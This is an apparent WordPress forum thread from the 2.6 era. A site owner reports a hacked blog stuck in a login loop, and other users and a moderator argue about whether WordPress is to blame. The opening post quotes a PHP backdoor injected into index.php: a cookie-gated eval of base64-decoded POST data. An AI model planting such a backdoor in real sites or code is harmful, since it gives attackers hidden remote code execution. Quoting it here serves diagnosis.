• Our blog has been hacked and we are unable to login. When you try login you get looped back to the login page with no explanation/error message. The Blog is up and running and I can’t see any issues (yet..).
    There were 2 files that were changed index.php and xmlrpc.php and I found this line added to the index file:
    <?php if(md5($_COOKIE['f711587cbed7bdca'])=="1452a323f11b0dd60c49b49f004f077c"){ eval(base64_decode($_POST['file'])); exit; } ?>

    Looking for help…
    Thank you.

Viewing 15 replies - 1 through 15 (of 20 total)
  • Experienced same problem after upgrading. Clearing my cookies allowed me back into my admin area.

    Thread Starter viewsoj

    (@viewsoj)

    I tried to login after clearing the cookies on both IE and Firefox. Nothing. It also doesn’t explain the changed files and the extra line of code we found in the index.php file..

    Thread Starter viewsoj

    (@viewsoj)

    Tried to reset the login as well and nothing happened. Can’t access the blog..Anyone have any ideas out there?

    Same thing happened to my site, CultivateGreatness.com

    It is a login loop. I noticed on my ftp, that each files had been downloaded and reuploaded… all dates are Sept 5 2007.

    Very bizarre.

    Whoever is doing this, isn’t very thoughtful of others, and needs to find a more productive hobbies or find more malicious targets.

    Are you using 2.6.2 and did you set your three custom secret keys (cookie security measures) in wp-config.php?

    I was using 2.6 and haven’t been able to do anything to the site since.

    I did do the upgrade to 2.6.2 but still not able to login.

    Does wordpress even look at the support area?

    I’m amazed at how little support this has received. Maybe its time to move my 15 blogs to a new platform, one with support?

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    Just because you were hacked does not necessarily mean it’s a WordPress problem. There’s a lot of ways they could get in to your site, and most of them do not involve WordPress.

    Especially if your main index.php was changed, it’s highly unlikely that they got in via WP to do that.

    well, it appears to be a non-isolated incident.

    Many people are having this same problem. Please think outside the box, and don’t write off our support issues so quickly.

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    don’t write off our support issues so quickly.

    When you actually POST a real support issue that we’re capable of helping you with, then rest assured, we will do our best.

    However you have not yet posted one single thing that merits any sort of response at all. You’ve asked no questions, you’ve posted no details, you have not even said what the results of the hack was, or talked about looking at the server logs to find the entry point. You’ve done nothing at all except complain. Inaccurately too.

    If you have a problem, then post a new thread describing the problem. Then, maybe, somebody will be kind enough to help you with this free product which you did not pay anybody anything for. Nobody here owes you anything just because you use their software.

    If you need support immediately, then I suggest you go find somebody to hire who can provide that support. Here, however, volunteers provide support for free. And you get what you pay for, bud.

    As for your 15 blogs, if you’re unable to maintain or operate them without support, then yes, perhaps you should move to another platform.

    The only bad thing about WordPress is the attitude issue people have on this forum.

    yeah, after 3 days of ZERO support… not even a message… then yeah, I’m gonna have a bit of attitude.

    At least a moderator answered this thread finally.

    Obviously, I’m not the only one to have this problem, so it may be a larger issue than you are giving credit.

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    What support do you want or expect? You posted nothing worth responding to. You’ve posted zero information. There is nothing of any value in this thread.

    I mean, honestly, WTF are you expecting us to say? “You got hacked? Bummer.” This ain’t no place for sympathy. There’s nothing we can say to this thread because this thread has no answerable questions in it. It has a total lack of any useful information.

    If you get hacked, then I’m sorry, but that’s YOUR problem. It’s your website, so eventually it’s always your problem. There are no currently known vulnerabilities in WordPress, so they probably didn’t hack you through that door.

    And as far as the WordPress forum is concerned, that fact ends the discussion. We can’t help you when there’s nothing to help you with.

    yeah, after 3 days of ZERO support… not even a message… then yeah, I’m gonna have a bit of attitude.

    Did you NOT read what Otto just posted? This is a FREE PRODUCT, no one here HAS TO HELP YOU. You’re not the only one with unanswered posts. Don’t go justifying your attitude by saying you’ve received zero support.

    Especially since no support is implied anywhere.

    I’ve found that if you ask nicely, most of the time, someone helps out. There are some really great developers who DO listen and help here.

    On the other hand, I’ve certainly asked questions that get no answers at all. C’est la vie…

    Most of THOSE times, it’s because I am trying to do something VERY funky!

    the wp-pro list has affordable professional help that I’ve hired before and had great results from… but expect to pay a reasonable amount for their time, it’s worth it in every case I’ve experienced.

    Good luck with it!

Viewing 15 replies - 1 through 15 (of 20 total)
  • The topic ‘Login Hacked – Security Issue 2.6’ is closed to new replies.